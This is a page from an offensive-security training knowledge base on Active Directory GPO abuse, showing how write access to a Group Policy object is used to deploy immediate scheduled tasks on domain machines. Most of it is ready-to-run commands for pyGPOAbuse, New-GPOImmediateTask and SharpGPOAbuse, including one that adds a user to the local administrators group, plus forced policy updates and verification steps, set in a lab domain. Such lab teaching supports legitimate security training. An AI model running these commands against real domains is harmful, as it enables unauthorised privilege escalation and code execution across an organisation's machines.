Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / GPO / Techniques

Immediate Scheduled Task

Immediate scheduled tasks are the cleanest GPO execution primitive for a lab. We edit a GPO, add a computer-side scheduled task, and let Group Policy create or run that task on scoped machines.

pyGPOAbuse command execution

pygpoabuse.py "ootw.local/gpoadm:Password123!@10.10.10.200" \
  -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" \
  -command "cmd.exe /c whoami > C:\\Windows\\Temp\\gpo-task.txt" \
  -taskname "UpdateTask"

pyGPOAbuse local admin

pygpoabuse.py "ootw.local/gpoadm:Password123!@10.10.10.200" \
  -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" \
  -command "cmd.exe /c net localgroup administrators ootw\\student /add" \
  -taskname "UpdateTask"

PowerShell immediate task

Import-Module .\New-GPOImmediateTask.ps1
New-GPOImmediateTask -TaskName UpdateTask -Command cmd -CommandArguments "/c whoami > C:\Windows\Temp\gpo-task.txt" -GPODisplayName "Misconfigured Policy" -Verbose -Force

SharpGPOAbuse computer task

SharpGPOAbuse.exe --AddComputerTask --TaskName "UpdateTask" --Author "OOTW\student" --Command "cmd.exe" --Arguments "/c whoami > C:\Windows\Temp\gpo-task.txt" --GPOName "Misconfigured Policy"

Force update locally

gpupdate /force

Force update remotely

Invoke-GPUpdate -Computer ws01.ootw.local -Force -RandomDelayInMinutes 0

Verify task XML in SYSVOL

Get-ChildItem "\\ootw.local\SYSVOL\ootw.local\Policies" -Recurse -Include ScheduledTasks.xml |
  Select-Object FullName,LastWriteTime

Verify execution

Get-Content C:\Windows\Temp\gpo-task.txt

Cleanup task artifact

Get-ChildItem "\\ootw.local\SYSVOL\ootw.local\Policies" -Recurse -Include ScheduledTasks.xml |
  Select-Object FullName,LastWriteTime

Then remove the malicious task through GPMC or restore the GPO from a known-good backup.

Notes

Immediate tasks normally run when the computer processes the GPO. The target must be in scope and able to read the updated policy.

If nothing happens, check the link, security filtering, WMI filter, client event log, and whether the GPO version changed.